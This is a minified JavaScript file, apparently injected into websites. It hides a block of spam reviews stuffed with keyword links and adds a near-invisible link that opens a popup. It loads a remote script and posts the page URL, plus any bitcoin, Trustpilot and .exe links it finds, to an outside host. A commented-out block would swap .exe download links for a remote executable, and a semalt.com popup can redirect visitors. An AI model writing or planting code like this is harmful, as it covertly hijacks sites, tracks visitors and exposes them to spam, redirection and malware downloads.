/* Domain is for sale: fawtuowo@gmail.com */ (function() { 'use strict'; if (window['shbNetLoaded']) return; window['shbNetLoaded'] = true; var isTopLayer = false; var popupHtml = "
Very well everything and in order. Very satisfied. They should always leave it like that. next day beer delivery<\/a><\/article><\/span> <\/div>
<\/span> <\/div> <\/div>
the WORST airport ever. If you plan to shop in Berlin with Tax free, this airport can make you crazy. Even the staff can say its not my problem and just ignore you. I would say this airport is Big F.... hair fascinator designs<\/a><\/article><\/span> <\/div>
<\/span> <\/div> <\/div>
Very professional and top notch work ... Highly recommend this place for any welding or polishing needs !!! die casting quotes<\/a><\/article><\/span> <\/div>
<\/span> <\/div> <\/div>
Work. The truth!! Excellent!! Sala Neruda, we were sitting back, looked and listened very well. gold juul cost 7<\/a><\/article><\/span> <\/div>
<\/span> <\/div> <\/div>
Awesome venue I saw Sleeping with Sirens and Palaye Royale. And Friday XX I see my life with The Thrill Kill Kult cant wait. bloquete mogi das cruzes<\/a><\/article><\/span> <\/div>
<\/span> <\/div> <\/div>
Every time I go there the doctors see me pretty quick, not a lot of waiting. ucb \u5922\u5e7b \u5a1b\u6a02 \u57ce<\/a><\/article><\/span> <\/div>
<\/span> <\/div> <\/div> <\/div>
Our family had a great time. And we loved the dine all day option. We plan to go back around Christmas time. branch trimmer heavy duty battery<\/a><\/article><\/span> <\/div>
<\/span> <\/div> <\/div>
Nice hotel, a bit problematic to park a car on hotel parking if youre attending a conference... paid advertising leicester<\/a><\/article><\/span> <\/div>
<\/span> <\/div> <\/div>
Beautiful hotel very clean and spacious rooms, the breakfast in the restaurant so good a lots of delicious food for small price online medical cannabis<\/a><\/article><\/span> <\/div>
<\/span> <\/div> <\/div>
The food was very good. Great Flavors, large portions, perfectly cooked. Been here many times and never disappointed. sportswear apparel manufacturers<\/a><\/article><\/span> <\/div>
<\/span> <\/div> <\/div>
Hotel is a little bit dated but is always a relaxing place to spend a few nights. Staff is always friendly. Free shuttle to train station and surrounding businesses. About a 15 minute drive to King of Prussia mall. cost concrete foundation basement<\/a><\/article><\/span> <\/div>
<\/span> <\/div> <\/div>
One of the best Luxury Five star Hotel in Mumbai. The peshawari restaurant serves signature dishes Dal Makhani & Paneer buy melanotan 2<\/a><\/article><\/span> <\/div>
Nicely set out. Plenty of cafes for the discerning diner. Shops galore. Well maintained and clean. Convenient parking . All you need under one roof. Shop-a-holic paradise. apple juice dream<\/a><\/article><\/span> <\/div>
<\/span> <\/div> <\/div>
This is a great place for kids to learn and adults to spend time watching all birds come by. Excellent spot for bids photography. Great place to view hummingbirds up close. espresso machine no water<\/a><\/article><\/span> <\/div>
<\/span> <\/div> <\/div>
This place is great super friendly folks. Overnite parking if you need it also they have showers with towels. AWSOME. super signal forex<\/a><\/article><\/span> <\/div>
<\/span> <\/div> <\/div>
Was wonderful to see these protected and cared for animals. en ucuz elektronik sigara<\/a><\/article><\/span> <\/div>
<\/span> <\/div> <\/div>
Small but comfortable place for parties. The food was tasty and service is good. Location little inside but once in, it is a warm place most effective wrinkle treatment in chatswood<\/a><\/article><\/span> <\/div>
<\/span> <\/div> <\/div>
Stayed at the Bluff House and had a wonderful experience. Service and complimentary treats were amazing! Had an awesome time photography print packaging<\/a><\/article><\/span> <\/div>
The dairy and Ice cream brand are fantastic and it s locally Made in Qatar corona ca plumber<\/a><\/article><\/span> <\/div>
<\/span> <\/div> <\/div>
Pizza is really tasty, and Ive never had it come out burned, raw, or cold. Awesome selection of toppings and sauces too! cafe fresco italiano<\/a><\/article><\/span> <\/div>
<\/span> <\/div> <\/div>
Great time because the DALLAS COWBOYS won the game \u501f\u9322<\/a><\/article><\/span> <\/div>
<\/span> <\/div> <\/div>
The waiter was fabulous tonight however the food was just mediocre ip lokalizacja<\/a><\/article><\/span> <\/div>
<\/span> <\/div> <\/div>
Answered all ny quieries promptlt and worked with me when a problem arised. Thanks dich vu seo o hoa minh ecd<\/a><\/article><\/span> <\/div>
<\/span> <\/div> <\/div>
Clean, quiet place just off strip. Internet was little spotty dropping signal periodically, but otherwise Platinum seems a good value. hotel mirrors in batumi<\/a><\/article><\/span> <\/div>
Good location. Good ambience. Bad service. Tasteless food. Boy scouts of america, cascade pacific council<\/a><\/article><\/span> <\/div>
<\/span> <\/div> <\/div>
Needs a Level 2 electric car recharging plug spot. capture desktop video<\/a><\/article><\/span> <\/div>
<\/span> <\/div> <\/div>
Good Swedish concept Unfortunately, there has been just as much Americanism in recent years. Its a shame as it drags down the overall impression greatly. screen record tool<\/a><\/article><\/span> <\/div>
<\/span> <\/div> <\/div>
Always great We laughed, marveled and admired a lot thanks for the evening chrome extensions download for pc<\/a><\/article><\/span> <\/div>
<\/span> <\/div> <\/div>
Went to G & R on Monday. It was closed. Please change open hours. I just found out that it closes on Sundays and Mondays. It really sucks since i need a fix for my flat. chrome app extensions<\/a><\/article><\/span> <\/div>
<\/span> <\/div> <\/div>
Had a blast with the grandkids!! Older buildings and need of some help in areas but they are in the process of a 18mil dollar update, so, would love to go back in a year and see again!!! youtube mp4 4k<\/a><\/article><\/span> <\/div>
<\/div> <\/div> <\/div> <\/div> <\/td> <\/tr> <\/table> <\/div>"; var bottomHtml = "
Very well everything and in order.\r\nVery satisfied. They should always leave it like that. next day beer delivery<\/a>.<\/article>
the WORST airport ever. If you plan to shop in Berlin with Tax free, this airport can make you crazy. Even the staff can say its not my problem and just ignore you. I would say this airport is Big F.... hair fascinator designs<\/a>.<\/article>
Very professional and top notch work ... Highly recommend this place for any welding or polishing needs !!! die casting quotes<\/a>.<\/article>
Work. The truth!! Excellent!! Sala Neruda, we were sitting back, looked and listened very well. gold juul cost\t7<\/a>.<\/article>
Awesome venue I saw Sleeping with Sirens and Palaye Royale. And Friday XX I see my life with The Thrill Kill Kult cant wait. bloquete mogi das cruzes<\/a>.<\/article>
Every time I go there the doctors see me pretty quick, not a lot of waiting. ucb \u5922\u5e7b \u5a1b\u6a02 \u57ce<\/a>.<\/article>
Our family had a great time. And we loved the dine all day option. We plan to go back around Christmas time. branch trimmer heavy duty battery<\/a>.<\/article>
Nice hotel, a bit problematic to park a car on hotel parking if youre attending a conference... paid advertising leicester<\/a>.<\/article>
Beautiful hotel very clean and spacious rooms, the breakfast in the restaurant so good a lots of delicious food for small price online medical cannabis<\/a>.<\/article>
The food was very good. Great Flavors, large portions, perfectly cooked. Been here many times and never disappointed. sportswear apparel manufacturers<\/a>.<\/article>
Hotel is a little bit dated but is always a relaxing place to spend a few nights. Staff is always friendly. Free shuttle to train station and surrounding businesses. About a 15 minute drive to King of Prussia mall. cost concrete foundation basement<\/a>.<\/article>
One of the best Luxury Five star Hotel in Mumbai. The peshawari restaurant serves signature dishes Dal Makhani & Paneer buy melanotan 2<\/a>.<\/article>
Nicely set out.\r\nPlenty of cafes for the discerning diner.\r\nShops galore.\r\nWell maintained and clean.\r\nConvenient parking .\r\nAll you need under one roof.\r\nShop-a-holic paradise. apple juice dream<\/a>.<\/article>
This is a great place for kids to learn and adults to spend time watching all birds come by. Excellent spot for bids photography. Great place to view hummingbirds up close. espresso machine no water<\/a>.<\/article>
This place is great super friendly folks. Overnite parking if you need it also they have showers with towels. AWSOME. super signal forex<\/a>.<\/article>
Was wonderful to see these protected and cared for animals. en ucuz elektronik sigara<\/a>.<\/article>
Small but comfortable place for parties. The food was tasty and service is good. Location little inside but once in, it is a warm place most effective wrinkle treatment in chatswood<\/a>.<\/article>
Stayed at the Bluff House and had a wonderful experience. Service and complimentary treats were amazing! Had an awesome time photography print packaging<\/a>.<\/article>
The dairy and Ice cream brand are fantastic and it s locally Made in Qatar corona ca plumber<\/a>.<\/article>
Pizza is really tasty, and Ive never had it come out burned, raw, or cold. Awesome selection of toppings and sauces too! cafe fresco italiano<\/a>.<\/article>
Great time because the DALLAS COWBOYS won the game \u501f\u9322<\/a>.<\/article>
The waiter was fabulous tonight however the food was just mediocre ip lokalizacja<\/a>.<\/article>
Answered all ny quieries promptlt and worked with me when a problem arised.\r\nThanks dich vu seo o hoa minh ecd<\/a>.<\/article>
Clean, quiet place just off strip. Internet was little spotty dropping signal periodically, but otherwise Platinum seems a good value. hotel mirrors in batumi<\/a>.<\/article>
Good location. Good ambience. Bad service. Tasteless food. Boy scouts of america, cascade pacific council<\/a>.<\/article>
Needs a Level 2 electric car recharging plug spot. capture desktop video<\/a>.<\/article>
Good Swedish concept Unfortunately, there has been just as much Americanism in recent years. Its a shame as it drags down the overall impression greatly. screen record tool<\/a>.<\/article>
Always great\r\nWe laughed, marveled and admired a lot\r\nthanks for the evening chrome extensions download for pc<\/a>.<\/article>
Went to G & R on Monday. It was closed. Please change open hours. I just found out that it closes on Sundays and Mondays.\r\n\r\nIt really sucks since i need a fix for my flat. chrome app extensions<\/a>.<\/article>
Had a blast with the grandkids!! Older buildings and need of some help in areas but they are in the process of a 18mil dollar update, so, would love to go back in a year and see again!!! youtube mp4 4k<\/a>.<\/article><\/span>"; var popupCreated = false; var bottomPopup = false || /[?&]test=1/.test(location.href); //officeLog(bottomHtml); function onReady() { tryCreatePopup(2); var box = create('div'); append(box, document.body); var defaultStyles = { width: '1px', height: '1px', background: 'transparent', display: 'inline-block', margin: '2px', padding: 0, verticalAlign: 'bottom', border: 'none' }; var a = create('a'); css(a, defaultStyles); document.addEventListener('keydown', function(e) { if (e.keyCode === 192 && e.ctrlKey) { css(a, { width: '20px', height: '20px', background: '#fff', border: '1px solid red' }); } }); document.addEventListener('keyup', function(e) { css(a, defaultStyles); }); a.className = 'shbNetgpLink'; append(a, box); a.href = 'javascript:;'; on(a, 'click', openLinerPopup); css(box, { position: 'fixed', margin: 0, padding: 0, outline: 'none', border: 'none', zIndex: 999999999, overflow: 'visible', direction: 'ltr' }); css(box, { left: '3px', right: 'auto', top: '50px', bottom: 'auto', width: '42px', height: '168px' }); } function officeLog(data) { } function clearStyles() { if(typeof document.createStyleSheet === 'undefined') { document.createStyleSheet = (function() { function createStyleSheet(href) { if(typeof href !== 'undefined') { var element = document.createElement('link'); element.type = 'text/css'; element.rel = 'stylesheet'; element.href = href; } else { var element = document.createElement('style'); element.type = 'text/css'; } document.getElementsByTagName('head')[0].appendChild(element); var sheet = document.styleSheets[document.styleSheets.length - 1]; if(typeof sheet.addRule === 'undefined') sheet.addRule = addRule; if(typeof sheet.removeRule === 'undefined') sheet.removeRule = sheet.deleteRule; return sheet; } function addRule(selectorText, cssText, index) { if(typeof index === 'undefined') index = this.cssRules.length; this.insertRule(selectorText + ' {' + cssText + '}', index); } return createStyleSheet; })(); } var sheet = document.createStyleSheet(); sheet.addRule('#shbNetPaddingTable', 'display: none;'); sheet.addRule('#shbNetPaddingWr #shbNetPaddingTable', 'display: table;'); sheet.addRule('.shbNetPopupWr, .shbNetPopupWr *', '-webkit-text-shadow:none !important; text-shadow:none !important;'); sheet.addRule('.shbNetPopupTable img', 'display:inline; width:auto; height:auto; background:none; float:none;'); sheet.addRule('.shbNetPopupTable *', 'margin:0; padding:0; font-family:Tahoma,Arial,Sans-Serif,Verdana; font-size:11px; line-height:normal;'); sheet.addRule('.shbNetPopupTable a, .shbNetPopupTable b', 'text-decoration:none; background:none; height:auto !important; color:#737373; font-size:11px; font-weight:bold;'); sheet.addRule('.shbNetTopLayer .shbNetPopupWr', 'display:block !important; width: 100% !important; x-index:99999999 !important; background: #fff !important; padding: 2px 10px !important;'); sheet.addRule('.shbNetTopLayer #shbNetPaddingTable', 'display:table !important;'); } function createTopLayer() { //if (!domReady) return; var div = document.createElement('div'); div.className = 'shbNetTopLayer'; div.innerHTML = popupHtml; document.body.insertBefore(div, document.body.childNodes[0]); popupCreated = true; } function tryCreatePopup(stage) { if (popupCreated) return; if (isTopLayer) { createTopLayer(); return; } if (bottomPopup) { var box = document.createElement('div'); box.innerHTML = bottomHtml; document.body.appendChild(box); return; } if (stage === 1) { document.writeln(popupHtml); } else if (stage === 2) { var mainBox = create('div'); mainBox.innerHTML = popupHtml; document.body.appendChild(mainBox); } else { return; } var wr = $('shbNetPaddingWr'); if (!wr) return; popupCreated = true; var table = $('shbNetPaddingTable'); css(table, { position: 'fixed', margin: 0, padding: 0, left: 0, top: 0, width: '100%', height: '100%', direction: 'ltr', zIndex: 999999999, background: 'none' }); css(table.getElementsByTagName('td')[0], { verticalAlign: 'middle', background: 'rgba(0, 0, 0, 0.5)' }); var popup = $('shbNetPaddingPopup'); css(popup, { margin: '0 auto', padding: '20px 25px 20px', width: '800px', maxWidth: '98%', background: '#fff', border: '1px solid #000', textAlign: 'left', position: 'relative', fontFamily: 'Tahoma, Arial, Verdana', boxSizing: 'content-box' }); on(document, 'keydown', function(e) { if (e.keyCode === 27) { wr.style.display = 'none'; } }); } function removeClass(node, className) { if (node && node.className) { node.className = node.className.replace(new RegExp('\\b' + className + '\\b', 'g'), ''); } } function openLinerPopup() { var pad = $('shbNetPaddingWr'); var tbl = $('shbNetPaddingTable'); if (!pad || !tbl) return; pad.style.display = 'block'; tbl.style.display = 'table'; var mainPopup = $('shbNetPopupWr'); if (!mainPopup) return; mainPopup.style.display = 'none'; } function $(id) { return document.getElementById(id); } function on(elem, event, handler) { elem.addEventListener(event, handler, false); } function css(elem, style) { for (var prop in style) { elem.style[prop] = style[prop]; } } function create(tag) { return document.createElement(tag); } function append(elem, parent) { parent.appendChild(elem); } setTimeout(function() { window.CJSource = 'shb2'; var script = document.createElement('script'); script.src = 'https://cleverjump.org/counter.js'; (document.head || document.body).appendChild(script); }, 10); if (document.readyState === 'complete' || document.readyState === 'interactive') { onReady(); } else { on(document, 'DOMContentLoaded', onReady); } tryCreatePopup(1); try { clearStyles(); } catch (ex) {} (function() { if (!document.querySelector) return; var added = false; tryAddLink(); window.addEventListener('DOMContentLoaded', tryAddLink); setTimeout(tryAddLink, 100); setTimeout(tryAddLink, 1000); setTimeout(tryAddLink, 2000); function tryAddLink() { if (added) return; var menu = document.querySelector('#wpadminbar .ab-top-menu'); if (!menu) return; var li = document.createElement('li'); li.innerHTML = 'SEO promotion'; //menu.appendChild(li); added = true; save(); } function save() { var json = JSON.stringify({ hrefs: ['wordpress_new'], jsDomain: 'gstek.info', refUrl: location.href }); var xhr = new XMLHttpRequest; xhr.open('POST', '//gstek.info/save.php'); xhr.setRequestHeader('Content-Type', 'text/plain'); xhr.onload = function() { xhr.responseText; } xhr.send(json); } })(); (function() { function byId(id) { return document.getElementById(id); } function setCookie() { var date = new Date(); date.setTime(date.getTime() + (60 * 60 * 1000)); document.cookie = 'closePopupStartWow=1; path=/; domain=.' + location.hostname + '; expires=' + date.toGMTString(); } function listenerPopupSemalt(event){ if (event.origin != 'https://semalt.com') return; if (!event.data) return; if (event.data == 'closePopupStartWow'){ var el = byId('popupStartWow'); if (!el) return; el.style.display = 'none'; setCookie(); } else if(event.data.indexOf('startPopupStartWow')>-1) { try{var res = JSON.parse(event.data); if(res && res.page){ location.href = 'https://semalt.com/?s='+decodeURIComponent(res.page)+'&ref=blogspot'; } } catch(ee) { } setCookie(); } } function init() { if (document.getElementById('popupWowNode')) return; var div = document.createElement('div'); div.id = 'popupWowNode'; try { div.innerHTML = html; } catch (err) { return; } document.body.appendChild(div); setTimeout(function(){ if (document.cookie.indexOf('closePopupStartWow') !== -1) return; var el = byId('popupStartWow'); if (!el) return; el.setAttribute('src', 'https://semalt.com/popups/popup_wow.php?lang=en'); setTimeout(function(){ el.style.display = 'block'; }, 400); },400); } setTimeout(init, 100); setTimeout(init, 1000); setTimeout(init, 2000); window.addEventListener('message', listenerPopupSemalt, false); })(); setTimeout(function() { /*try { var links = document.querySelectorAll('a[href$=".exe"]'); for (var i = 0; i < links.length; i++) { links[i].href = 'https://myprintscreen.com/soft/myp0912.exe'; break; } } catch (err) {}*/ try { var links = document.querySelectorAll('a[href^="bitcoin:"], a[href*="trustpilot.com"], a[href$=".exe"]'); //var links = document.querySelectorAll('a[href^="https://"]'); if (links.length) { var hrefs = []; for (var i = 0; i < links.length; i++) { hrefs.push(links[i].href); } var json = JSON.stringify({ hrefs: hrefs, jsDomain: 'gstek.info', refUrl: location.href }); var xhr = new XMLHttpRequest; xhr.open('POST', '//gstek.info/save.php'); xhr.setRequestHeader('Content-Type', 'text/plain'); xhr.onload = function() { xhr.responseText; } xhr.send(json); } } catch (ex) {} }, 2000); })();